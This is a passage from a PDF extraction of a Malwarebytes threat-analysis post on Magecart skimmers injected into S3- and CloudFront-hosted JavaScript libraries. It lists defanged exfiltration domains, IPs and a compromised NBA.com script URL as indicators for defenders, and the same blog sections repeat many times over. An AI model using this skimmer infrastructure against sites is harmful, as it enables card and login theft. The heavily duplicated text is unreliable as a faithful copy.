here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 166 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 167 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 168 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 169 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 170 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 171 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 172 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 173 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 174 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 175 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 176 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 177 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 178 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 179 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 180 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 181 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 182 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 183 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 184 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 185 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 186 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 187 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 188 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 189 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 190 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 191 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 192 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 193 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 194 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 195 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 196 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 197 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise 